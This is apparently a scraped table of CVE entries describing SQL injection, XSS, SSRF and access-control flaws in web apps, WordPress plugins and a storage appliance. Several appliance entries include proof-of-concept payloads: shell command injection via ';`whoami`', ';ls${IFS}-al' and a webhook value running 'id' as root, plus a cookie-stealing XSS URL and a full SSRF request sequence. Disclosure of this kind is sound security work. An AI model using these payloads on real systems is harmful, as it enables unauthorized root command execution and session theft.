| CVE |
Vendors |
Products |
Updated |
CVSS v3.1 |
| A security flaw has been discovered in SourceCodester Simple Forum Discussion System 1.0. This affects an unknown function of the file /ajax.php?action=save_category. The manipulation of the argument Description results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be exploited. |
| A flaw was found in the Lightspeed history service. Insufficient access controls allow a local, unprivileged user to access and manipulate the chat history of another user on the same system. By abusing inter-process communication calls to the history service, an attacker can view, delete, or inject arbitrary history entries, including misleading or malicious commands. This can be used to deceive another user into executing harmful actions, posing a risk of privilege misuse or unauthorized command execution through social engineering. |
| Authorization Bypass Through User-Controlled Key vulnerability in PROLIZ Computer Software Hardware Service Trade Ltd. Co. OBS (Student Affairs Information System) allows Parameter Injection.This issue affects OBS (Student Affairs Information System): before v26.0328. |
| A vulnerability was identified in SourceCodester Online Hotel Reservation System 1.0. The impacted element is an unknown function of the file deleteslide.php. The manipulation of the argument ID leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. |
| A vulnerability was determined in SourceCodester Online Hotel Reservation System 1.0. The affected element is an unknown function of the file deleteroominventory.php. Executing manipulation of the argument ID can lead to sql injection. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. |
| A vulnerability was found in MuYuCMS up to 2.7. Impacted is an unknown function of the file /index/index.html of the component Add Fiend Link Handler. Performing manipulation of the argument Link URL results in server-side request forgery. The attack may be initiated remotely. The exploit has been made public and could be used. |
| Local users are able to execute scripts under root privileges.
POC
On the local host run the following command:
curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`' |
| An authenticated attacker is able to create alerts that trigger a stored XSS attack.
POC
* go to the alert manager
* open the ITSM tab
* add a webhook with the URL/service token value
' -h && id | tee /tmp/ttttttddddssss #' (whitespaces are tab characters)
* click add
* click apply
* create a test alert
* The test alert will run the command
“id | tee /tmp/ttttttddddssss” as root.
* after the test alert inspect
/tmp/ttttttddddssss it'll contain the ids of the root user. |
| An authenticated attacker is able to create alerts that trigger a stored XSS attack.
POC
* go to the alert manager
* open the ITSM tab
* add a webhook with the URL/service token value
' -h && id | tee /tmp/ttttttddddssss #' (whitespaces are tab characters)
* click add
* click apply
* create a test alert
* The test alert will run the command
“id | tee /tmp/ttttttddddssss” as root.
* after the test alert inspect
/tmp/ttttttddddssss it'll contain the ids of the root user. |
| An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
POC
http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al |
| An attacker is able to launch a Reflected XSS attack using a crafted URL.
POC:
Visit the following URL
https://<IPADDRESS>:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)> |
| An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.
POC
Step 1: Prepare the SSRF with a request like this:
GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>
HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0
Step 2: Trigger this alert with this request
GET /qstorapi/alertRaise?title=test&message=test&severity=1
HTTP/1.1
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1
The post request received by <TARGET> looks like this:
{
### Python FLASK stuff ####
'endpoint': 'index',
'method': 'POST',
'cookies': ImmutableMultiDict([]),
### END Python FLASK stuff ####
'data': b'{
"attachments": [
{
"fallback": "[122] test / test.",
"color": "#aa2222",
"title": "[122] test",
"text": "test",
"fields": [
{
"title": "Alert Severity",
"value": "CRITICAL",
"short": false
}, {
"title": "Appliance",
"value": "quantastor (https://<HOSTNAME>)",
"short": true
}, {
"title": "System / Driver / Kernel Ver",
"value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
"short": false
}, {
"title": "System Startup",
"value": "Fri Aug 6 16-02-55 2021",
"short": true
}, {
"title": "SSID",
"value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
"short": true
},
],
"footer": "QuantaStor Call-home Alert",
"footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
"ts": 1628461774
}
],
"mrkdwn":true
}',
#### FLASK REQUEST STUFF #####
'headers': {
'Host': '<redacted>',
'User-Agent': 'curl/7.58.0',
'Accept': '*/*',
'Content-Type': 'application/json',
'Content-Length': '790'
},
'args': ImmutableMultiDict([]),
'form': ImmutableMultiDict([]),
'remote_addr': '217.103.63.173',
'path': '/payload/58',
'whois_ip': 'TNF-AS, NL'
}
#### END FLASK REQUEST STUFF ##### |
| A flaw has been found in Campcodes Grocery Sales and Inventory System 1.0. This vulnerability affects unknown code of the file /ajax.php?action=delete_user. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. |
| A vulnerability was detected in Campcodes Grocery Sales and Inventory System 1.0. This affects an unknown part of the file /manage_user.php. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used. |
| The Markup Markdown WordPress plugin before 3.20.10 allows links to contain JavaScript which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. |
| The Markup Markdown WordPress plugin before 3.20.10 allows links to contain JavaScript which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. |
| The Admin and Site Enhancements (ASE) WordPress plugin before 7.9.8 does not sanitise SVG files when uploaded via xmlrpc.php when such uploads are enabled, which could allow users to upload a malicious SVG containing XSS payloads |
| The Etsy Shop WordPress plugin before 3.0.7 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers. |
| A security vulnerability has been detected in Campcodes Online Learning Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/edit_subject.php. The manipulation of the argument subject_code leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. |
| A weakness has been identified in Campcodes Online Learning Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add_subject.php. Executing manipulation of the argument subject_code can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be exploited. |
